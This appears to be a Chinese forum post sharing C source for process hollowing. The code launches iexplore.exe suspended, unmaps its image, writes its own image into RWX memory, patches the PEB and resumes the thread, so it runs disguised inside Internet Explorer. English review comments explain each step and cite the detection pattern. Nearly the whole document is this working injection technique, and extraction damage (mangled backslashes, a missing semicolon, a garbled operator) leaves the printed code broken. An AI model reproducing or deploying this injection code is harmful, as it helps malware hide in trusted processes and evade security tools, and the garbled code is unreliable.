把自己插入到IE进程中
把自己插入到IE进程中,用TCB启动自己,随便写的垃圾代码,参考了老V的代码,高手莫笑
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ntdll.lib")
// Hand-rolled prototype for the native API ZwUnmapViewOfSection (exported by ntdll,
// which the #pragma comment(lib,"ntdll.lib") above links in). NTSTATUS is declared
// as a plain long here; the only value the caller below treats as success is 0.
typedef long NTSTATUS;
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
HANDLE ProcessHandle, // process whose mapped view is released
PVOID BaseAddress // base of the view to unmap (the child's original image base, see InjectProcess)
);
// Per-child bookkeeping, filled in by CreateInjectProcess().
typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress; // image base read out of the suspended child's PEB (a 32-bit pointer stored as DWORD)
DWORD dwReserve; // never written or read anywhere in this file
} CHILDPROCESS;
// Full path of the host executable; filled by FindIePath() and handed to CreateProcess
// as the (writable) command line.
char szIePath[MAX_PATH];
// Builds the iexplore.exe path into IePath; dwBuffSize is accepted but never checked.
BOOL FindIePath(char *IePath,int *dwBuffSize);
// Parent-side driver of the hollowing sequence. Returns FALSE when the running module
// path already equals szIePath (i.e. this image is executing inside the child) or when
// GetModuleHandle fails; TRUE on every other path, including several failure paths.
BOOL InjectProcess(void);
// SizeOfImage of the running executable, read from loader data via inline asm (hModule is not used).
DWORD GetSelfImageSize(HMODULE hModule);
// Starts szIePath suspended and captures its primary thread context and mapped image base.
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
);
// Entry point. The same binary runs twice: the parent copy gets TRUE from InjectProcess()
// after attempting the hollowing and prints; the copy executing inside the hollowed
// iexplore.exe gets FALSE (its module path equals szIePath) and shows the message box.
// NOTE(review): "/r/n" is how this page renders the original "\r\n" escape — the page's
// extraction replaced backslashes with '/'; the literals are kept exactly as shown.
int main(void)
{
if (InjectProcess() )
{
printf("This is my a test code,made by shadow3./r/n");
}
else
{
// "进程插入完成" = "process injection complete": the only payload that runs in the child.
MessageBox(NULL,"进程插入完成","Text",MB_OK);
}
return 0;
}
// Derives the IE path from the system directory's drive letter: the character at index 2
// is replaced by the terminator, leaving "C:", and a fixed Program Files sub-path is appended.
// dwBuffSize is never consulted; IePath is assumed to hold at least MAX_PATH bytes, and the
// GetSystemDirectory result is not checked. Only locally obtained data reaches these calls.
// NOTE(review): the page's extraction turned backslashes into '/' — '/0' and the
// "//Program Files//..." separators are shown as the page has them, and the terminator
// line as printed also lacks its ';'. Kept byte-for-byte; nothing here is corrected.
BOOL FindIePath(char *IePath,int *dwBuffSize)
{
char szSystemDir[MAX_PATH];
GetSystemDirectory(szSystemDir,MAX_PATH);
szSystemDir[2] = '/0'
lstrcat(szSystemDir,"//Program Files//Internet Explorer//iexplore.exe");
lstrcpy(IePath, szSystemDir);
return TRUE;
}
// Parent-side hollowing sequence: start iexplore.exe suspended, unmap its image, allocate
// an RWX region at this executable's own base, copy this process's in-memory image there,
// patch the child's PEB image base, point the primary thread's Eax at the entry point and
// resume. From a defender's view this exact API chain on a freshly created suspended child
// (CreateProcess CREATE_SUSPENDED -> ZwUnmapViewOfSection -> VirtualAllocEx PAGE_EXECUTE_READWRITE
// -> WriteProcessMemory to the PEB and to the new region -> SetThreadContext -> ResumeThread)
// is the process-hollowing pattern (MITRE ATT&CK T1055.012); the running child's image no
// longer matches iexplore.exe on disk, which image-mismatch and RWX-private-region memory
// scans key on.
// Returns FALSE only when this image already runs under the IE path (the in-child case) or
// GetModuleHandle fails; every other path, including failures, returns TRUE.
// NOTE(review): "/r/n" in the printf literals is the page's rendering of "\r\n" (backslashes
// lost in extraction), and the "│" between MEM_RESERVE and MEM_COMMIT is a garbled '|'.
// Both are kept exactly as the page shows them.
BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];
DWORD dwImageSize = 0;
STARTUPINFO si = {0}; // not used in this function; CreateInjectProcess has its own
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD *PPEB; // child's PEB, taken from the initial thread's Ebx (32-bit convention)
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;
HMODULE hModule = NULL;
ZeroMemory(szModulePath,MAX_PATH);
ZeroMemory(szIePath,MAX_PATH);
GetModuleFileName(NULL,szModulePath,MAX_PATH);
FindIePath(szIePath,NULL);
// The hollowed child was created from szIePath, so GetModuleFileName there reports IE's
// path and this compare sends the in-child copy back to main() with FALSE.
if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
return FALSE;
}
hModule = GetModuleHandle(NULL);
if ( hModule == NULL )
{
return FALSE;
}
// Walk this executable's own PE headers in memory to reach OptionalHeader later.
pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
dwImageSize = GetSelfImageSize(hModule);
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess) )
{
printf("CHILD PID: [%d]/r/n",pi.dwProcessId);
// Release the child's original image mapping at the base read from its PEB; 0 == STATUS_SUCCESS.
if ( ZwUnmapViewOfSection(
pi.hProcess,
(LPVOID)stChildProcess.dwBaseAddress
) == 0 )
{
// Ask for a region at this process's own base (hModule) so the copied image needs no
// relocation; the call may return a different address, which is handled below for Eax only.
lpVirtual = VirtualAllocEx(
pi.hProcess,
(LPVOID)hModule,
dwImageSize,
MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE
);
if ( lpVirtual )
{
printf("Unmapped and Allocated Mem Success./r/n");
}
}
else
{
// The suspended child is left alive here and pi's handles are never closed.
printf("ZwUnmapViewOfSection() failed./r/n");
return TRUE;
}
if ( lpVirtual )
{
PPEB = (DWORD *)ThreadCxt.Ebx;
// Overwrite the load address: PPEB[2] is PEB+0x08, ImageBaseAddress on 32-bit Windows.
// The return value of this write is not checked.
WriteProcessMemory(
pi.hProcess,
&PPEB[2],
&lpVirtual,
sizeof(DWORD),
&dwWrite
);
// Copy this process's already-mapped image (dwImageSize = SizeOfImage) into the child.
if ( WriteProcessMemory(
pi.hProcess,
lpVirtual,
hModule,
dwImageSize,
&dwWrite) )
{
printf("image inject into process success./r/n");
ThreadCxt.ContextFlags = CONTEXT_FULL;
// Eax of the initial suspended thread is where the loader expects the entry point
// (32-bit convention); compute it from whichever base the region actually landed at.
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
{
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
else
{
ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
#ifdef DEBUG
printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax);
printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx);
printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx);
printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx);
printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip);
#endif
// Neither call's result is checked; the child starts running the copied image here.
SetThreadContext(pi.hThread, &ThreadCxt);
ResumeThread(pi.hThread);
}
else
{
printf("WirteMemory Failed,code:%d/r/n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
else
{
printf("VirtualMemory Failed,code:%d/r/n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
// pi.hProcess / pi.hThread are never closed on any path.
return TRUE;
}
// Returns SizeOfImage of the main executable by walking loader data in MSVC inline
// assembly; the hModule parameter is never used. The walk relies on undocumented
// 32-bit structure layouts: fs:[0x30] -> PEB; PEB+0x0c -> Ldr; Ldr+0x0c ->
// InLoadOrderModuleList.Flink, i.e. the first LDR_DATA_TABLE_ENTRY (the EXE itself);
// entry+0x20 -> SizeOfImage. lodsd loads the dword at esi into eax and advances esi.
// x86-only: MSVC has no inline asm on x64 and the offsets differ there.
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;
_asm
{
mov ecx,0x30
mov eax, fs:[ecx] // PEB
mov eax, [eax + 0x0c] // PEB->Ldr
mov esi, [eax + 0x0c] // Ldr->InLoadOrderModuleList.Flink (first module = this EXE)
add esi,0x20 // &entry->SizeOfImage
lodsd
mov dwImageSize,eax
}
return dwImageSize;
}
// Starts the IE executable suspended (CREATE_SUSPENDED: the primary thread is created but
// has not run) and records what the parent needs to hollow it: the thread's full context
// and the image base the loader mapped. si.cb is left at 0, and neither GetThreadContext
// nor ReadProcessMemory is checked, so pThreadCxt / pChildProcess may hold garbage on a
// TRUE return. Ownership of pi's handles passes to the caller; nothing in this file closes them.
// On 32-bit Windows the initial thread's Ebx holds the PEB address (undocumented convention)
// and PEB+0x08 (PPEB[2]) is ImageBaseAddress — the same offsets InjectProcess writes back.
// @return TRUE when CreateProcess succeeded, FALSE otherwise.
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
)
{
STARTUPINFO si = {0};
DWORD *PPEB;
DWORD read;
// Start IE in suspended mode; szIePath is passed as the (writable) command line with no application name.
if( CreateProcess(
NULL,
szIePath,
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
pi
) )
{
pThreadCxt->ContextFlags = CONTEXT_FULL;
GetThreadContext(pi->hThread, pThreadCxt);
PPEB = (DWORD *)pThreadCxt->Ebx;
// Read IE's load base address out of the child's PEB (PEB+0x08).
ReadProcessMemory(
pi->hProcess,
&PPEB[2],
(LPVOID)&(pChildProcess->dwBaseAddress),
sizeof(DWORD),
&read
);
return TRUE ;
}
return FALSE;
}